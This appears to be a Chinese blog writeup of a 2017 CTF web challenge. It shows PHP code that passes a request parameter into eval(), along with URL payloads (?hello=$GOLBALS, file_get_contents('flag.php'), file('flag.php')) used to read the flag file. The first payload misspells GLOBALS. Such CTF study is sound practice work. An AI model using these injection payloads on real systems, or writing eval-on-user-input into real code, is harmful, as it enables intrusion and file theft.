您的位置:首页 > 其它

“百度杯”CTF比赛 2017 二月场--web 爆破-2 writeup

2019-06-14 15:19 826 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/weixin_43578492/article/details/91977158

题目描述

解题思路

点击链接得到以下代码:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
  1. 尝试将hello变为全局变量(GOLBALS)
    在URL后加
    ?hello=$GOLBALS

    结果:

得到FLAG

  1. 由第一步可知,flag不在变量中
    猜测flag在文件中,使用file_get_contents() 函数,其作用为把整个文件读入一个
    字符串
    中。
    URL?hello=file_get_contents('flag.php')
    右键源码得到flag
  2. 也可在URL后直接加
    ?hello=file('flag.php')

    file() 函数把整个文件读入一个
    数组
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: